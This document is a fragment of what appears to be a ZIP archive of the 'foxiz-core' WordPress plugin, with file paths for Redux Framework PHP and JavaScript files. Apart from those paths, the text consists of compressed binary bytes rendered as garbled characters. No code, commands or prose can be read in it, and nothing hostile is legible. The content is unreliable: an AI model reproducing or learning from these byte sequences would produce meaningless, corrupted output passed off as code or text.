l?[nn]l:23= %<}] Wq}ǯ3|-mҢlbY)нakrPpalO8O$W#Xӝ) I D(td/58jXZ/ڳI9wǃ6q9^/e>pnuqy20}s~7w!e'Em:N2i%iErz[~8ҽ+ŵ좐+ 01wi]j7j6Bl_w-᪮@awcvq?ȡ%e߻kx~`?d]{ `E*ǘ5b҇M~(;\޳}^ tg=u \ CRcPЀA/BczVmyj[Ms'*vZ7F 9[̓eIu %w9>/Jy0Y9_&Ż0KQAU~'Pae4@V'^n修3vfrV|-T 'n@ u-(UH&)=5_&F:H*{ g(Q5E@EOG<Jfslu64^#*1Tg|W[Y:%Aza<6jqkQasF-~%\_÷ 7\uZag8YUJAXW]XTa$HAhl02f ψI'v8I|%PdZь-) !jBPH>c NBp"v(nSvK1K8d $DpC $)ZsqՊ͝qQf?y z˹ uQRn V )k:N?r*csj߱iήrwd (Gh@s_MM@0VYqIbXy2][؜s=\Kw[u r<ck`K慰t5/]9J H矾O]ʾ&/eELǝŭ#cgml]qvT޲{PͬZtPS+ jk/]-Z=*~HZͿct"eKQe1#EV{ۘ/@ʵkFDaUzJg<+d7;El^hQ L+buެX] n2K;?S `ua /zl]?0I;C2;O,H6͚Am{"sUtgMd58β2n9b%I Stiai+6ӽWlLPkoO~()"Mbn3F־gtёDx'@&Wnv2XRL:u~/* zQ}y) E⪲sQ`8wy %8y'9>DX(Y]<=^ $/a4`a[?pD/ +y$!n @tPP|=QFZd3 hQ)G mYx5Bͫj}eYﲛUШŎ1ZʌΌeV,Ljc?mT2T-7˼.fjEx]#\9f70O١L1^+i-jqwzm}!9h4 !IQVQ2] V*$ypШbDxq '[% x \^!AO4AElT.U5-U<_%NsI*\!7Ib`&I [IYO&afh2R '(pw:ي?YWPx.?W,o]6=&$B_>mhkt+(k]յ,8|L9A}U)!8N&Dva8 P2Hɖ:(Q*6t@%v+7(^Zo`7DuWxȪMŖekc*7&gFN`̋%"ecL` h.|OmEA#Йe[vFFAOBt'jW-x-L}[veo|ށώ>*F3 tFNP#QK:ŞY)B-ESµ+ €2>x~_ٙ7ܥ-$y]W믣!V9qw#'{d[']o9mg+އDμޟʐ':N#{ZD҇Cw_wC#+(֘hF#:F\_ JEWZA-"R$3lϟS D$U-DŮN4~S]yE!P$dKK2uBSi^r;A_iX{ o %foԮ*AKo᪺,rωKHQ6Qp%!V = Jxg ǞO<ڡo/^+Z{qk#r}Ts$EoKS2j7[ E8;diYrKzs>;Y2|=q.Xh q %&[!ŕ;ކZDXoCf}pޕ;D]"ř ArM^fWǓ?vjumbTh ?%CqM\^j0Pd'+ EZd7TtFC轐o G {w)ӁUM3k?`uJ{x⡗ѻ]|D1>]rqA$m^jfYhPl= sN:2 ֮b ,mr"Ь4PFtWL#ª)Wtew<@ةq4x;of^XaM $k/4} rl͛!T@ں6uش 6 ' k=Eӓ8qyN 97=PFp y9}S| |p|U^/toosd`"\ݜQEI&`K_kABc 51m!|_U*: Qhʚv7!pֆFbWQt`߇Da]g)7댵FPo7KF-![gjS* ;|g[rW{cs͂TQb^fd VsdVKy#efQAu\3KAuj8:*˛Y|֕[]s>ge a^,>Ӟ|Yh4Kig%4Knn| z+Yۃ ,0)%B[ *ZxL*H^$n4ԓ1qgy8:8 [i1I8c c H1!jVv8 QcC2:([]yNʽ0PwY:qA&0Sݧay5߽a;lloGkó5^𝁰hN"gQ ʛ~_Ӱk[O=KB-wn)L"ê H+Rs_w!Ao LkKj W *sw~==α63q.c̋[]sHh(nD 1c/NЧ[cq!4ɄoL̕*MbMPxUGn;f⢢W$ED:47'-;5y Jq>.cnS۬E.d&vy"x19_%Y)orNTU"TLOLnJd C(yԜѦ?%8(?SyvV2{䲑 %jE%d_dl߈0>! !Z"rA Sl';/ft?lU쯟~~?+LV{֢_3ƬkTz!<;Tn_'gp#_2b%YE}/sVc̷nt}aJUï/ԔjG9 n5$r+`'5E*S 9LC'dڝC??ʇ[+"N!C%j hUۙ]tBBQL6W8X1m"]{,'c*j`>r큲`<Pd19\@ nnR>kNnl[3Wk2|fw;gbozc̙#wb8#x=)bЄ_L>lfgovbvzf8cwXI;)*9^Wx&xDP]袪 УYVY:knk4pn̮ k!tJaIp8+̽u8mG!I*dҮH")dt*O3ds0˳o|{EHoe#4fE"#&" 4 2`0EJ!+!k@:@]DnU>VG0V\EÌb%'i 3 JE*pUk{1LD (&I!0 X|r%2aYB}JEC;^X;$"_幸Abg"}҄e.n\5^5\Õ^){ԬcwlnX>!`ڰ\ɲ*uk|$ɯw :kru A! *R9E8DFlьQD΂-}ldMl[j{5\m$[+P9U0ӦPQ48AF |z1S6>WiHpW,Q،o *V}y; GrB;⁂I2w y_U 7\ELD)v׆T1#*f-MQLEpóqh`4ګ='`4Y7`=>Qќ4{MTD+E#?Ecx` Z9<6 syQvH`H1ЪHt@cPMVu " /Ǒ+,|% :X|ss Vo0wMgr$ e:Q1O)ڟ򌎌nzRC*oVD^ڟ6Lo !GG\ѶWbYmxb_5Kb a_/@(b!!d!AAޠ[ ;X06GGZ]ӣ[)}QLw(apP~چT1S(N" sy*3PKmD_l/\Ydh{j{{p o{Y.b(}9UbJ,h(ې*.iB94=9W _l}ɳ5z<lnP tnĒMVw FHn4=]fgWPC( muQ'5Oumo'%v"w!_KfGAo](:U'/yy2Iqޤ{ҋrO>;Y(~[2~ c@eUsZTsȓ5oEPP<' ~V (F#ҋiZyg<H4l*47(Q#f߀ v+?&Uޔ-*Po+(bޣb((} g `? b܄~\iSLK_Yn焥Oyh\-ϺP>8\5[N0~&Op(K^ڟ]hˀ5E-I_<[~ MR988Lu9g!r4Xg mD&|5go _%CS%ePWc;v4hBi:sݥVfKY,aN8i]PJkjjE+;۴iZְCm^_]PкrA~o M8l%5a&9>-8!:^)B͆DzZOÇBv(^{4-t$j{< ~(A("y68DGp{KU zU ꆿ3(! a5zodQ,5謲_M8ߓǏ; NޔYcI+9+XL-`x ڀ޲.:]M8@`T ?E/P(6Z(N)>9]1QFI+Q"iT' |U^'2]Z(y2>m*d6n6UUX.65얗7j'3b'ƴ=⯬ N$y+xO88__/r0>' " OjPen "~f ׀aӀ(戳!PE6$o'?!;RuV,8q+ːbʥf:8Ûaxn9-{U>+.?'Q΀}e%%Cb?wЈ(jҜ-qխA ?`L?Nl2[" tnu@RxFϨ2(lQYQ߈R9_ƴ[mnj#&VKO՚90`711>LV5n7`7YX%og 8EzG@SD_ 6e!M,&ATn!xb ꡲ _ Xup .;Lg
f{Wϧgo)"0iاe Qos&KV+cLQ!pBCOrlh]XM^49Y򑚒#xWW9T߾ѫUl=JOVlYly3UnGy1/G8_tՊekQ]ٟ?|JΒ@L"Zwlb×3~`xWnaA5DD(ec} ?i4\Tlyt)589n9K3i=)e乲MʩxTg r@d<VXpdN($1yF_Il#J[$VD2Z'?iC23-7 ̲'~{Ђ?˩u)3! T$f R<hFö㨍}~(;CzZN뵺M5(|n*=P_^1?C2rrvVx3PϽꂹU|TF1]*xJ# =ar~_9:s.yi\Qd1#2[7GIٱyYUՉ' V;=ݜϚ @@g/Uj8CϪTHtNB ṷ A* ؛V\x.J 0s<ߦw=Z棘}LSgtxP`qbN2g9&,Cd ^Qx!`)Vag3n~s۬Gܿj<@ϟΫҾ E,ߖKӡ qq]v2- <)$/^\pu7K閷L.; _#~Cԝ^z!d% ,y3Cm'^ȼ}H5b:lmO_=29@w#D3~K-eVWu,_shlfdC|QO#HKz0KâPt@&7G&jzGGK%Wүh/=%$?ͺ9GPKkT#foxiz-core/lib/redux-framework/inc/PKYRnPS.foxiz-core/lib/redux-framework/inc/browser.php]}w;ON;MIIlVŎ{e_ox=İ;I3?fFZW\}rhkukw}r4M bFs]7Sk)[6jXc8.9e3ܤ}? yηɣݽHYd^Kを>0هx爭nlbQ kCES^Pvz,i^F}K4fwp^Q\u ˽?m ^BaGpH{$`>:46:!C͢ El@3!E$DֺഠnbBȈfeN@ܗ y0<%VcZ;G삺yTQzo=h|}k2()F+:3Ry WӦc6)"Y [ݼ Vm l0a]1 .>G'gb8 m3Rf%NN . X\vhH O(geW=` z`OCw$e,@Kwo d [¡K6[BuSl6aiύ)0vDtLY{EuikKvUn ^WOaMVh𪄘m{ ȩi)\p[Mpk:quxe) "X;giNmoIuWdgK`ΙZk\ldpXri|YkV|Ŭ⭿Twx%:15ydLbTN3m{6hkqi +.90`ιqx c=xNL{od5g2?&L`}+ svΆsAʩC#֛VspM5coIvzzj8z]v¬^[MfSi8^{T i-\7q?&❷]΍VHR9chvX (vB^J?g-PBcA7]1_0v!J:-u_ zm^yӚ̌C\O/'Iu!^!ssL$[|:f9~:bUT Nak0xR۾Ip&x+I`#i\랍_E]viS2% dT_MCb@x$}fLҐGz9՗$`(+!ʹDPÞν`F\vD:8K/K$E ָ|>QRיvu+"O)CR8o7h֋n6;剱 qČS ],zڣlv9k^R Pgm)/&_B(1;˹l,pu",ף{&rsbZ3PK* %G-=up&zN{&HZ􆏐7l<z퇴7SħB=UpS'9m[ :lx4ǃVp(
    )-1E.;lP8<'rPL}&U}Ěi`C2f)hecTԑZI~;L,Ar4ϸ7u*j9IMA:1$~bHj3^EHH/HgQ/“8 fBH. !ѥA"$DHB !)hNeP8@YѩyRA!ܣT~[mI5/5m@dd=|*p٦ʢHuVw19 6]:nh2̮VKʁB҄)uoV!B?OaNT8R~8aL%pR׆OW߽\lwT(9mWUĠ(*Rt",%Q*mg$B%k*IK{ 'e")A쯵Ԥqz3-&WscZ/ }AS4A`4٬3o"]eY5AgX#K5^JR?Slz1)mJƻ?vwl׷?;|hTIysj(P}9M6"2gB)/@t_m'4̸v?gujXI*'R'&.bӁgJxeEo9u%£`JFJuN:\G΍xpHn{چ= pertO=?_'^DJbOejސ*LjD|O=s;UUe2AնPۖ2%ߠÊlbɌtM}^} :BIQX*19 wLM:&lACb|폊707Ý ~}A$tDvq͛SK^.{.v GaV^p'2,;rYe.֯*^2X'w]y_ v'x^׶w<F^8 a~TAAy|aI,ь WBxOk⯍D[b$C:zf2 TE9e.r&I2*a3e0]kC^% f>:[[ᐞb":g"lUD&[I({fkJFbͮ<5na \* zglR՛)>/$?f6 I@;u]pm8Dž[-.N55],vjնE6 :ѻսkE73丮ol?Pvf|[^c)j1DʍՊZc1Y> /Vk:+NajDEp3G8XzAnXtX=+~#VcQl>C\El:]ۺepj%m>WTpmN〝k-j O(ƕsE)ԜTZX;J@.R AUє-`I.w"$dy qD.R{C.r!U>8Y\P:qTNRߔY9/q؀'sj3<}6$VB,t5^c*8[SRZ(L7 !Q`WT.yι ߹ScPE] йŶɼb6&YT_nKC"pga=`"lE1"6ĀsT6\ |NzbIt_DHxaA|Dz5C/#G?9Ks 72h29O$4e~[ ƕ F0;|CV[<poV-๫MB黽hR JZ!(x/&\THcoKQ&fy&,Nv k~$)Yb[6[RU/>k*j7!% [c=v `8*i(WKy JA0naEPwɈ,i=$}a[ 8B=QЀV) 0{ avC֮Y|LZ3ʝԄߟ'W*-V1̦Nc"[0* QC+_2,1E@;O Z򹬻mQ̆>,Upp6?haZe: ƥz#ǡ+XfOdhd2M# >ՎPQ,B. ȝbf'07a67fA _AIDęY-hvD"*u߮y kϚA`P9VY~s,lß/&É8Cp4ţ>yei1g ͡_# Mvko=A`Wgyk2@ hxMRx'*5 J:B'd+Z *O0IhmLp]QDKؕ뉛 e[VL!mGȽ}ؘ& a+Jsc7o4|+ \c}0(o QF7/_m qbgH#Ǹ,<&SA Ԝ큮M'%=RսawNHn"k#FZ1٪3 HcX1.+ Dh0YCh.g[QKDvػ.x4OSpZ_i*% VBͣ͐^Y8SZSP|F;dά~OQ>!~|f4f?Ԋ[ZiVr|ʧ ZR2Ǭder Ae,ss*I%.tn!wT4tY U6ǧzn4QEQuV#IN*LVK)̀f|Fei pg? @?Ph 0k{]cT͑&.2|YԭW b.ʺB뮡( =QC`ETcpqߍg8gx OjR_8%$/ @FP@2EP<ߐ͑/ҹk( 6>q㟤Q8ޫDz]c'n,<)HިyZAkM~^j(?T_Fwh(@Z9Zq*]|edgkhcQ}&vY%jPrMu n&AYA6vQ}OРCF5mx){b.@SJ 7,^͛CU2*ۻxŃxgSǒiVC}5a6NTHJؐ&u~?$&kÔb,"ie< Ut[iPUgVpN,`ǐbpռ{ kE᎟"*Lxt1k _zcv%$ EWJA8JL 0Mh|U[nM9lurв rށV/Z ifB~V4Gc3]1[i3z۽a|ˁRvO41{CjTSfpqqST푭Y\$"+ 34~g}Kԛ[d#\9g#Un}$D$.RibW A{-ZȤ&8j'0s y\,]/3Xm/oP ; FXs(t(ۥ>;γXHaw|V-CHƆ7J6Y"1*rFv~uhAI xcccjrUL3DҬ0b֤4kr@,MH-H 8%sV]TbSI&jf%b%;/@PhÁR 2j-[j: 3HV *eL7s~%Y(.D>F"Pwca1&A"k"gQs3תqδ\ːTdĚ,=TLY I=GDLS$Wcg!pB[s`M+ZRgxZH~Og{r[,tZ Sӟ[W5=M)>.hi/i:gAɰf,5A2beG6+%k)V 1ڲ/Ƌ?j.J-VKD|08ug q62z <)~uVaII872zB&kr/N^:.<^coLy&ܢy&Ы1& Nna)o9ۮG(;v~) Kc #PG?b-]'gL-&(dt@ⶽRdSȕH,& q!nPQJg[Z{eG.?r9G k5/yY/!}B_`X+( ,5YM(YwWgА\2P)؜sJȯWVħA~) SFL3օ h@,ԋ;Ý1T,T~OCUJ Ck Ft/A,HnɑZ,$TnYI(YWY"JA>^ 1ZK[!cC`QG*c&/%NgyFt:E)&`VY ˌ+%j.%E"fSASUٔe`຺X#);h*aըG%Jm]5 „C8gwGXD6VS5)ve.ӀLXFy$X1We?,p‚*OvTA~dnA'DA &36 uJ+SieB"̾ -Z2!k=M AA0Km7ŋG6@<1{|l6O]?PXJyZ]ϧa׈=i_fc5n[V/<5R7Y, ֵEz|@p+ ,0sla8W9k*&:Gκܻ6EKY1uhbQM=z,iv;ԦK=||@Yg%2wjuIOE϶mFDU G-Bq6a"-#[)tq y1%,26mQ2mH'o"J7|/} X|im{nA߂>H\ֺpqõdEY+ȅ{# ܉V|pb 0q0,Vhۡjۉ=5pz#G{nDx݅r[_̚|kx<젖Qb=$v6fHgYQFP}>_6-n{0zqt;6>xu2 \%}A/ҦW㒥7mS-pw-;S?OZ`]nR8cGpWn6}VgHvϨ~q8Ƈp q79j@lϨT-y~wG7Gǧ/IIò3QɊHLLyɭvG#\Yl<{K&y[8PBUpnj>1nQVʯm aXvnn߰}N'AZs:EI`nZYkvVF΍׵cQh8͑&Z$zvE `o#d&i6p9ʵL I1_! ,5T[ !eI7ZTZQ"PZv~Ugqlt~zQhIcTKt#kQp)]\'<\nͲV}-Qk37JZ@N[ ܒ&6EC÷qPU_Ǩl Wڵr MeD##U |:qqEw)D-wKyw d Z~&k!؉E|4^X*r1s T (t~|cW$S)yT Yغ ݷ S*c1w+Yzq~֔q} ucFvc =gb;dkhy 3qkuq;$NcKw;4l#K dbL1PKlzS#"@foxiz-core/lib/redux-framework/inc/class.redux_admin_notices.php]s۸=brƦ=ٖ7NiW댫@$d1H ek")r}C731,M^W_x?x?I|p%SGw1Wa?Qrϣݟ> 4.rY$B:y6zI% %/E**V֭LW< D+MZ-/T.~YyֻTgVg)!!$5.%b%"Ofpj\sI&MXaQQ#KJ3 Q -hFRRgt}j(1ZfksTPꦷ*BsRzV~kơ*)8Y1C ϸ dW-H$F!gXf{2LXO`6Dm:1*0\kn1"̅#(qև,G<ڌN}caGHDL5*A&^4BzBOeݝAJ0c:1kF^ӹHRts2\1}} Q*4^x}KipwY힡evIjLVd재OQNItU=%Ӕ аUovdv(ݭ(cWQ򰗒vi[A$f b拵 m2L8@7엚`s]hS=iӿW>S˩UShJ C4^h_63DY50Lc&瑜2 1-r뙦>G55Q>IcP$Vc>=;q^u 虃|1= *PjP>y zyZ':C̃в&E *~I3i: oUqc´[1ު wtz(C fktwC8 Ӽ5n L90)VZ:Xq G0|-;L5:QB]g{fxCOA{Z@. ޶7 1Ą -}9rx;&ӝQpAP3W]x쨄e n-7~Mxnm˖^vN,kAOhrS[2)4/^ĭĴue[xh_Bk`Zv2PImKHݓ+nkj*1Zn5)~ L7ۗ;;. *m8^dQb6lWQB7צ)U\BT|cl&4;NOO%N{LvA/?˫uJ6"JY:nUpM"!+5Z~3DO EԌܴzz=+T E?V$\Ln~Nj^HUII MX=C1Y'Oˏ&9_B>=6٤FHݒg*p.%o}>d[[StdT;X%ي/g/f/oF@PnxMZ \sg7$-6kQ&yIYe($֔|IV Ʈ"=^n]ƘhWi^J2RYBI]!D|47IuzDxzqd\BD}u]RqLSKͨ>SF`qCQH 6ԀT"7dK&S!iS4Yijz(AR'j'MaB)2q2FFlA" D(:'Pm~G 6Ifʜ1+Vm΅[R;p^-'??\ 68AjcWh̅y'+2cdk.'OMh|V^=M(hlr-$fmfDQzCi(҇hp!yr>A3?i o ,z*qRA,8(ɿv4}r},n:oo9lR(SLc(@M { u3q>9?B>&Y4/ /Lk>e&b:!RO69JhKp,F,]"9輪<`gjsqEO/.甚^L>!RZ=JA">#с"+B@CKӌ!e'K!4&3Md.hVD]{ T,drɽ̄P0pY$p.;lA sU!dꊳZ`puk*n^XҔčk\xZwe^.g^w TxoT?mzfIӪ_ vd|l7lSDޠU3EGe,t[kv(馭L<ַ1KEʆBdaOYF5a::.!4ȩ~-Q+7Q3$>%','$If~foNa,g\-dVF$)Q2»[BC S*l/w@IXESϮ ^W:ǻyOeMAa?S-'LAeFzc|(|(봽M9%K%r"vUb q5oR%Һ>e1]`a~a-W]\ y(d|H'aomm\Cͫ "UP3ieH!LA*b BC>O_)0dU&k*(B>Or(W!i a㛃"stv44yT{ab+ HPe1 Y?Ҫ*y.:d. M$ $s3k؅qFd7tS^EKVt -ش;B37熢a>*
    [S.q3)ij xita*m*P!`X[TaO GG|cXI``ҡz4]ҹELq QDC%Sge7ٳQRm `43 FVotF ϊ/>5{e/1qmV#ӷ-NY{?v_D.+a..gq֬_WT]l= Ԝ1~m(?68.t߸ZP4ٯ)sZgnľTJ0evT%$8T[] ν5+b\(SI)hj/EBjTᘒjY 8 v }Ͼj܌`\<ڮ˞ *勚1)/'=b͸MO.4' 6_> ['A<=dB*wJN*4L弰SK:x+kB Mi#~1SMƨTqHEferTVşsz"UnfBkvi,Ⴤw ZkzJŲ"e\ Tg'i4X{i7kņm+a42Cc3F0/]uGU|3tj$N/Y=c]$ ۰oM5{t*ЬhU#0iT[RG< "t_YG bp֊h^vS;>P? %XYLH{F YvݍjLhZ<smq W(X݄*x2 {)\y܉*C cn>vICRdu-;Wh B'a 7y +8bіJy+:VpnNyVJB,hVBܝxN}k:*_Wizi̓ q>[ڶ8|z~߿~{͔dž^*˸9{]'d]$J !*ky{֥#K#qgcke ۭtB($30⚔Z8*Ո/bXUgTxE]|}{^~n~Ac4w)}3W@Ǩ<ߪn o?xKzn8:?#M3k:=㶗BY,OwDV׀莾:C3*+9 Iʤw¯#SfOl|0ѷ|6V2u%x"+@8 fƚDY{}I6P+f aC8ׁ<& 5\Hz&@:苯 )L_ 5h0uߞ:StmhVLPhJz\_s0tnFoPKYRDz"s& 6foxiz-core/lib/redux-framework/inc/class.redux_cdn.phpYmo6\kBN>q.`[V4(Zm"2cߑX8vj;w,tipxh0$!9 TiDJYIgB;.R,(t gIpMZm~-Q8g;/`n6T)B$ t\ /!Dv?{p;IHww E*pCV(|ƐDdϾIy#قhL"K.e$=Z OVmyǃTXuR: ' "} y(4@Yg9 inA-^tDM [zFP6 WZ5ܹ>uףOm6=gՏg͍ڢ?o[w^Mcӎ].I\9l@~fE i#{>1˿T~e?U}Ғf?颶ӔgTy= G9qg^İu`?UlZxNgF?뾸73d΀cKʦ&l OP ]PKYRbe 4=foxiz-core/lib/redux-framework/inc/class.redux_filesystem.php[ms۸_PR8n &3pL+]DRyќx*Ҹ6250h| }_UI>9g l2MY'@S xBxiu"[eO2`+R1/b[h,78^fj<'&E3 /h8bKܜܰf*Q @!ʓ5\?(śq eqNab8>ކI9ʣ>z1):u|:-iYhV'#ыgcL>Z]b=4IJ:L a0rug@|Y6K*fΉHlOGiڥDD*G˙u%k21G -X @$pr-&DF"Dj1>qႳ4򮁲:=8_)cvrOr#t;>}<F4E: T}Bb9bșǩ`hG`9AP x S?^0^-!BɀۉV/ $`*Vě͆e-APy|<e#4VC߭O>^\Q('iƞ/'eT"'d10ubrnE?}98{71ſ ckLkv?G;-TQXH,isM*H$ AEJcN{0{N-J[cd,B\D\C)$ KV1P+F4±C aڗ[B勺X\#w@Yozpc"U<` DA\N9[W]C%I]+B,5pOX7LkɬS;P= y^-!⼵;|d?{\WFjkB3S{*!@Mg?!zG6Q*h$a\b"5qPw~v/(JC{ŪieN0\ @`fֺ^ uP #Y~?7 g/hqA\y@~j`8rt cҿj'mt[J 2 dK6r@6]*E )rD~8gקWϭ,̿t[x{X?{Liw74} 37DʴR'v.1[:69Зo/ݳP傚 Rb=2;flֶ65@#[RY T}~gH3_ca{]egϊ]+b=9yS◳J} ظ[68 b/}SpwdnE()-o$+Yc; +5c/[f IOam^X:G X`·E{//_=uڅ5P mzi"&%vM`~8(3~ǣD3bvGʉ މjh; rb'OE8ဤg.JIpRJ6B 0ѱd U Pif<{GU|n0@"kloU=?x#WS~+DvٿV.k eBauv]\F//mYpκieoU*vVmrpc zz#mQٚ}:ЃFOGM1O:)1(Au{oC `1UN}%HHL۝4a@T $[U ,ӂowQ},{K%=aAD;ar۾mz,H1s5ᣜWaY?ܱM=$-wx蚘lGyn ]:)nbfX&iv8 Ȑ,-O O2tu8P@b܋N8DaʌRZy̚׮f__˿/}ә+s;7>xFs ~8ùersv\$'۬?p*sp>UnD7CnXŌҪڟW&"cPKYRg+ ,<foxiz-core/lib/redux-framework/inc/class.redux_functions.phpZ[oF~ϯB)eei¶:ΥNP{7X1"G:CQ̐(Vdv&̙s1guvr<п䱸M;Z7<yy&]IDHvqЏW!`T.R){gÜK}_(%RyP,Ks K˩~>M'gAEO~Ox8rya m+` ~%+X[V牫il!Zs y&+ƣȢ_P?0}|8=vo&kpWgy,+zI  kaK~X~Q]afqhi%,y͘䤼hJuqi _YSvN@>_,E^D܅ov%r8](ݧ)K|B`H`ҹP9͓&M>noxE)mI஋ _3ҷ$:0뵰1zqT>&X! 7 Ãxf+G4F=ju^i$8lE x}I9:3eyy/!Dj"rw;|.4QĪcRvb5)TLLjͬy^}ڻ~vu}=}f/yumtǾ]\]LcyV䮟"d\Jga?:Vfg&u~dP4s$| {KݔV.ʫ4&vJAkezo7 ?-~q=[PЅw>c? #ZQr#D:e k !7s.7*1;b/*QPޤ2$e6!FY#UAGȡR3\֬(] o3ox+[H,IY(.+xHAFUԵZg95=W W/%6 Ƚ͎rX"StՇ փ eC]= } RP,Tl۾ 4ןj{m9%uLZ)I2;omIU~MIV"ΡZL..SOr㻒*"ܘC@QЇ)W"@}FzK=K4:8IJEvùDHM *HK٣=qkPBi LSt##}DYRr_w B| YF}Hͬ%xߌ5$$|\cc?>NЎ:iRdfiKr.B[ߚv[Az0Z:.neگك>yP`EYWd׽SZNiˬ[:GVM$44c* BEF6zH0nk5?CFfi9ag&L 4/29S&3 -x#ڤV<,7"J3Ȇ(eB/5†ZYEΨq\EN'ZcJ BZ9ds@u GDMpـXz>p[5\Yʔm*ꏈ TX%z[D:ju.M?Fլ|]VۤemsdHMbx4' (ӏ`6x80e6W7dRM2l@-y;J?R9;.?$D,~A_3j4ƧMݻKorI|fT_(I:Bl̥~'l/TO6|u l~{)SS.abSD!'>Kb|>ᦚ-3M in(iw!qoXv&#G(aRP.g3n#Tg:mj@ٖIS~TLl@icm#\w/oZڙx>!>A|ajq}+WѶIjw08E74\TZ˸tV4kZ=}fkj悶PhA~V⫰r&J9?T; PKR=y]:foxiz-core/lib/redux-framework/inc/class.redux_helpers.php6qg`<*8JbUɄ8󨀡D,(IipGt{c^k1%jcJY`e4z[d1O@N9Om9RVkkӬx Ρj`lx6#iM0){2(2 gi?_mFobLPO=_}O<ToxEt yO }{ ƵU 0}}`bA^> afbȈ˞a F _-& WcRC* ;f6T4J5>4/è*D}cOڄ0?t{7OxE\*VGǡ3FĹly:,E9+  7Цzj$$`@ mU)JICoCgZ/wXol}eE*cŇl%2QY ώO>> N?~:=~TOewp8dw?M9!=K>]~Q5kpo/'W?eȒ")YbQ΋h|OϠ`,FQ6oH.y$0X۬vV:NMaP%xd0F$B^ k%]hXrbX \r@^$}>}n6)rpI`sH\iݺDXTh;Z,y =2 $FV9YlK8t?_ BA (X1[;W-&IYVU69KYRo%>|hJ";dƒj@bC"5[iaж*mwP:%9VZ}dyI9@*T06!BϣrnWz 榇 ߼?E=Tr6"Q+{5,,@QH\k] R1]j=W .h\T5UE4AO{ oR j|C!e|;E1\.'S_OIeY*RmyUC=Xn˰ȦmTSa>q<=BFmѝH1= M!{5x^gm͡?.j%-/2aFnă͓8i$ 3ҕEq&.kЗ^rs8 s0I}McCFxbڀ LL l&1le_T& MbqQ マI^kU#ON|Rilv,xT{P&K.|tt~~ :gӧ)-]J*'ASuAY2_R.9kT5/|0>~)#yQ6DIhI/imLŘ2\l-dKY+clnx)Il@ }JGOɰ#Wc,-9eSʳS S҉ lx2Ct''Q3ʲhQByܘH58wlvW!9ǟbI EIHȸ#ouPcrh1ԒoKXuֵg$α<.P)<&6|Ay "ATgƌf^?QQ!o/7Qz~zq>4׉?b @cK{;R^zb6&*Nxު [dǰ.؜)#[EЁZQoAv- ѡwV$f!0 5 .3L`[䂢8_Z* <jToD9?sAJL?3Lag1t0B%24$J-U(";[:kd,Kh7oи<'= g>ĮW;jBQHlPL'>=`/h>MٛœXItͲO k} pȝ,Ľ vL`B$ːL3lyB`I:-M=s(ݾ⁾ st+@^pS8$S?r qGT5lԊ]~ y&Y>ā i%7931 +}YfUWN|Qf':5y\VC&g :L)N=C*5OB!L4}C'BfU Ⱥá7Uz51f)Q"LELEt+Un:jѫ/A8t5tÖOFa! ތ0x:+04ku\.$GB!eG>NHҋCW>=tγ ,_zG1ω9(S@q2Z}kwͲ`MTaq֛.jgbVQ:ՌM #3*s&j+W`Al+GSI:V]1bp4a YѺ?TsADh Xd8AX|}kkuNm^y*?^A.von}|];l9J]a]mɓ1І 4+]402ZG)ZͱN{i"J EԢ[2 Ƀp?V(U>Rrsf},Nq݂K@G2أi%E[0IS3Ecg8B2?h@l0?qbk#[`3Y$U2>A[Ux-;Xdh-:2$Wyyݣ&b:#/q>c?窃E$)w H bN^!+3`p{{ϣ.npWlq\dy,KlҌJHW[#Nw5\F5NL?ykZl ïn1 9DPKYRo0<foxiz-core/lib/redux-framework/inc/class.redux_instances.phpXmo6_q J& u,EtsDLdI`ߑhJ"%)6"mx|;R?-W]Ѩsi~ $\$p&pkHWD=$EN9$.R5UVZ(WZ/DD%%K7hq\RSZYBĞ ߭eqGiաa҇7$⊆xg9!":5ةs6Jsr˓wLFä:]KS9~ !o0G?bRKɃXR!FN1%%'-0P-.b TE\"|õ ,H) LFARıƋXGťF[j UO1 bk^-LwVsCGFՍ U q !%L'+%)!\gaT|tJmYw\6!ȋP( %{ZV;b#x0»!%K$*z 18Œ &$gEo=hm+r$`࡞Z#^/=Fd[*zǸWJׯbF.c/x[4UJ;iќNJIX>4Dȯ~eY(mIoKM|3v2}MO"FjsK7 ՎGu5DՇrѢVz&^DoUQ**cagSwe~4tWdV8k̂ټ4hA8i8M)z}fޚj:m< 31&B$ӻUj 'i2ヌ_޾mi4b F1lc\8iy|[M<)no:EpIG>tnC-sCXpNoH̤me)z?s  ձa\X-CuZA`>﨎e\Rb6)Yߚѻ>s1sfH a8=v0viB*kEY#zQdݜۜ^s͑];I)칬 1a+ڤƁݫ Rp-k֎6Nu&!U96V+wfƠRa׀ZmpKtF/﯃m$!eFcجDAN y^.Y51OD]6OMPKYRdY^FPfoxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.jsmʻ@y۪D':lQNjvt4ّxDɿz"ݭ,<.lN&l+$O]8}'+̑ثJLOUQ쿦GGu^ܕzSI4s#dqi@ow4TVXX(bea^|WF*LϨfۤ>/a)GBf}u: %7YENıGѮR$G/i6\WyO]^M48\en-U,E3#"uzU᣺Q{uV0*@ 8ɁzW\EK\a$hZ1 h|.dY HE Oy3]V-1mI2j0VI#i)[T \X*ިM,_*(Cd2.Xķ30D’ȔU|`n}Ph3i;k,HdŮv$<ͼ?Eԗ8-P|_YC^^` @BaϨsjRE$E&#l=7w"V+Ki>h]\q1)Ƹ$Ģdu'sB2{@Z3 Yt{k+@d$AQ@x`xvi~Rq*v'i~K::ߒV^VaT^kI[6 Yg9n;=ro.V2 z*NWijOEf{&[p}%晴bμg#4< A/Q$ UI:쎮$æ"[M{z05ez"цx& -\h2LExr8gL96?F:H$Z/vO'k#ΟcmG읆 p¹V;g5j-^u|Fe[Dʷ q(~Wt;@_%CdAf'JpޕQiE\Umbk9+.Z@xdAgفjSû1G]_%y^2SL}㱧1je#(BΥFz(RA#**,Ri63@ 1rׯ6Yl ? T(#G0(qpܼ1>H@q>*'9`:yɲCDԀe´I@^eQ,-輼Tˬ֑(Hqթȴ!_'vt/(f`y? n$$7Luy47-]ҚVopj57J%a6 - \&Iv#l",;Op WS$uا3oPZq00YJR~Oy祇'Í[sQ5iTB鎵p$B Fbj l|uV=_jڑ(¶l-wE[ꪗA" pd[p\"PkNL6{CȽ+h#?TJCX!<*Rfְs/hg>Zq}I|8׃(j>oUIߡɝ+n@aDڜRyqDPe.9)U\|00wŚ0M ?" ,@\ʈ slB`cNNcsG1>XVpZOk~R`l{p>m/$nUVOȘ#a'>j{i"SmU=p@2*]e61a%  MZM{Fv=/W]"lʙڝ̅sJ,pOnyOF`~1~(p:L]g!_ufU=Q/|Zdt/͚ʯSԦţe\`{P9Âȑd 